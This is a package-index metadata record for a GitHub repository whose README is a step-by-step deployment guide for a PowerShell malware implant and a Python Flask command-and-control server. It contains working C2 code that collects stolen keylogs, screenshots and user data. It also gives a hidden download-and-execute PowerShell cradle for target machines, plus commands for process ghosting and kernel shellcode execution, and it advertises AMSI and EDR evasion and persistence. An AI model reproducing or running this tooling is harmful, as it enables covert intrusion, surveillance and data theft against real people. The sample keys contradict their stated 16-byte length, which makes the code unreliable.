{"id":24905927,"url":"https://github.com/exfil0/winmal","last_synced_at":"2026-05-18T06:12:43.909Z","repository":{"id":275241915,"uuid":"925519547","full_name":"exfil0/WinMal","owner":"exfil0","description":"Advanced PowerShell-based red team implant along with a custom C2 (Command \u0026 Control) server","archived":false,"fork":false,"pushed_at":"2025-02-01T04:07:32.000Z","size":6,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-01T05:18:09.703Z","etag":null,"topics":["aes-gcm-encryption","amsi-bypass","c2","dll-sideloading","edr-evasion","implant","kernel-bypass","malware","persistence","poc","polyglot","process-ghosting","windows"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/exfil0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-01T04:01:42.000Z","updated_at":"2025-02-01T04:10:58.000Z","dependencies_parsed_at":"2025-02-01T05:28:10.981Z","dependency_job_id":null,"html_url":"https://github.com/exfil0/WinMal","commit_stats":null,"previous_names":["exfil0/winmal"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/exfil0%2FWinMal","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/exfil0%2FWinMal/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/exfil0%2FWinMal/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/exfil0%2FWinMal/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/exfil0","download_url":"https://codeload.github.com/exfil0/WinMal/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245931756,"owners_count":20695958,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aes-gcm-encryption","amsi-bypass","c2","dll-sideloading","edr-evasion","implant","kernel-bypass","malware","persistence","poc","polyglot","process-ghosting","windows"],"created_at":"2025-02-02T00:26:03.846Z","updated_at":"2025-10-04T03:01:58.376Z","avatar_url":"https://github.com/exfil0.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🔥 Red Team PowerShell Implant \u0026 C2 Deployment - Full Documentation\n\nThis document provides a step-by-step guide for setting up and using the PowerShell-based red team implant along with a custom C2 (Command \u0026 Control) server.\n\n## 📌 Features of the Red Team Implant\n\n✔ 🛡️ EDR Hook Unhooking (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread, NtLoadDriver)  \n✔ ⚡ Windows Defender AMSI Hooking \u0026 Memory Patch (Bypasses AMSI \u0026 ETW Logging)  \n✔ 💀 Kernel Direct Execution via NtAllocateVirtualMemory (Ensures Execution in All Environments)  \n✔ 📦 Process Ghosting (Executes Shellcode in Deleted Files, Bypasses EDR)  \n✔ 📡 AES-GCM Encrypted C2 Communication (Google Drive API / Slack API / Dropbox API)  \n✔ 🖥 DLL Sideloading with Signed Microsoft Binaries (WerFault.exe, Consent.exe, WUDFHost.exe)  \n✔ 🔐 Polyglot Shellcode Loader (Hides Payloads Inside PNG, PDF, DOCX, ZIP)  \n✔ 💣 Multi-Persistence Techniques (WMI, Scheduled Tasks, COM Hijacking, Registry Hijacks)  \n\n---\n\n## 🚀 1. Deploying the C2 Server\n\nThe C2 Server is responsible for:  \n✅ Receiving exfiltrated keylogs, screenshots, system data  \n✅ Decrypting AES-GCM encrypted data from infected hosts  \n✅ Hosting payloads for remote execution  \n✅ Managing remote command execution on targets  \n\n### 🛠 Step 1: Install Required Dependencies\n\nOn your Linux VPS, install the necessary dependencies:\n\n```bash\nsudo apt update \u0026\u0026 sudo apt install python3 python3-pip\npip3 install flask cryptography requests\n```\n\n### 🛠 Step 2: Deploy the Flask C2 Server\n\nCreate a directory for the C2 server:\n\n```bash\nmkdir ~/c2_server \u0026\u0026 cd ~/c2_server\nnano c2.py\n```\n\n### 🔥 Step 3: Write the C2 Server Code\n\nCopy and paste the following Python-based C2 Server into `c2.py`:\n\n```python\nfrom flask import Flask, request\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport base64\nimport os\n\napp = Flask(__name__)\n\n# AES Key \u0026 IV (Must match the one in the PowerShell implant)\nAES_KEY = b'16_byte_secure_key!'  # Must be exactly 16 bytes\nAES_IV = b'16_byte_secure_iv!'  # Must be exactly 16 bytes\n\n# Function to decrypt AES-GCM encrypted data\ndef decrypt_data(encrypted_data):\n    try:\n        encrypted_data = base64.b64decode(encrypted_data)\n        cipher = Cipher(algorithms.AES(AES_KEY), modes.GCM(AES_IV))\n        decryptor = cipher.decryptor()\n        decrypted = decryptor.update(encrypted_data) + decryptor.finalize()\n        return decrypted.decode()\n    except Exception as e:\n        return f\"Decryption error: {str(e)}\"\n\n# Endpoint for Keylogs\n@app.route('/keylogs', methods=['POST'])\ndef receive_keylogs():\n    encrypted_data = request.data.decode()\n    decrypted_data = decrypt_data(encrypted_data)\n    with open(\"keylogs.txt\", \"a\") as f:\n        f.write(decrypted_data + \"\\n\")\n    return \"Keylog received\", 200\n\n# Endpoint for Screenshots\n@app.route('/screenshots', methods=['POST'])\ndef receive_screenshot():\n    encrypted_data = request.data.decode()\n    decrypted_data = decrypt_data(encrypted_data)\n    with open(\"screenshots.txt\", \"a\") as f:\n        f.write(decrypted_data + \"\\n\")\n    return \"Screenshot received\", 200\n\n# Endpoint for User Data Exfiltration\n@app.route('/userdata', methods=['POST'])\ndef receive_userdata():\n    encrypted_data = request.data.decode()\n    decrypted_data = decrypt_data(encrypted_data)\n    with open(\"userdata.txt\", \"a\") as f:\n        f.write(decrypted_data + \"\\n\")\n    return \"Userdata received\", 200\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\", port=8080, debug=False)\n```\n\n### 🛠 Step 4: Start the C2 Server\n\nRun the following command to start the C2:\n\n```bash\npython3 c2.py\n```\n\n📡 Your C2 server is now running on `http://your-server-ip:8080`\n\n---\n\n## 🚀 2. Deploying the PowerShell Implant\n\nOnce the C2 Server is running, deploy the PowerShell implant on the target machine.\n\n### 📌 Step 1: Modify the PowerShell Implant\n\nOpen the PowerShell Implant script.  \nSet the C2 URL:\n\n```powershell\n$C2_SERVER = \"http://your-server-ip:8080\"\n```\n\nUpdate the AES Key \u0026 IV to match the C2 Server:\n\n```powershell\n$AES_KEY = \"16_byte_secure_key!\"\n$AES_IV = \"16_byte_secure_iv!\"\n```\n\n### 📌 Step 2: Transfer and Execute the Implant\n\n1️⃣ Host the PowerShell script on a web server:\n\n```bash\npython3 -m http.server 8081\n```\n\n2️⃣ Download \u0026 Execute the Implant on the target machine:\n\n```powershell\npowershell -exec bypass -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://your-server-ip:8081/implant.ps1')\"\n```\n\n---\n\n## 🚀 3. Using the C2 Server\n\n### 📡 Live Data Monitoring\n\nTo monitor exfiltrated data, check the logs:\n\n```bash\ntail -f keylogs.txt screenshots.txt userdata.txt\n```\n\n### 📌 Execute Shellcode in Kernel Mode (NtAllocateVirtualMemory)\n\n```powershell\nKernel-Execute -Payload ([Convert]::FromBase64String(\"your-kernel-shellcode-here\"))\n```\n\n### 📌 Execute Process Ghosting to Evade EDR\n\n```powershell\nProcess-Ghosting -ProcessPath \"C:\\Windows\\System32\\svchost.exe\" -Payload ([Convert]::FromBase64String(\"your-shellcode-here\"))\nProcess-Ghosting -ProcessPath \"C:\\Windows\\explorer.exe\" -Payload ([Convert]::FromBase64String(\"your-shellcode-here\"))\n```\n\n---\n\n## 🔥 Summary of Features\n\n✔ EDR Hook Unhooking (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread, NtLoadDriver)  \n✔ Kernel Direct Execution via NtAllocateVirtualMemory (Ensures Execution in All Environments)  \n✔ Process Ghosting (Executes Shellcode in Deleted Files, Bypasses EDR)  \n✔ Windows Defender AMSI Hooking \u0026 Memory Patch  \n✔ AES-GCM Encrypted C2 Communication via Google Drive API  \n✔ Multi-Persistence (WMI, Scheduled Tasks, Registry Hijacking)  \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fexfil0%2Fwinmal","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fexfil0%2Fwinmal","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fexfil0%2Fwinmal/lists"}